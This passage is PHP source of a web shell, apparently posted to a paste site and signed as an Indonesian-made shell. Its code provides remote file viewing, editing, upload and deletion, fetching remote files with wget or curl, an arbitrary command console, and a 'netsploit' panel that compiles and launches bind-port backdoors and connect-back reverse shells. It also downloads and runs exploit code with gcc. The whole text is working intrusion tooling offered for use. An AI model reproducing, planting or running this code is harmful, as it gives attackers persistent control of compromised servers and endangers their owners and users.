- if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
- if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
- <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
- <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
- <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
- <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
- $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
- <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
- <table class="tabnet" style="width:320px;padding:0 1px;">
- <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
- <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
- <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
- <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
- <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
- <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
- <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td>
- <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td>
- <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
- <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use">
- <option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td>
- <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td>
- <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
- <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr>
- <tr><td><select size="1" class="inputz" name="pilihan">
- <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2">
- <input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
- <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
- <center><div class="info">IKI NGONO SHELL MADE IN INDONESIA <span class="gaya"><a href="http://fb.com/idbte4m"></a></span></div>
Add Comment
Please, Sign In to add comment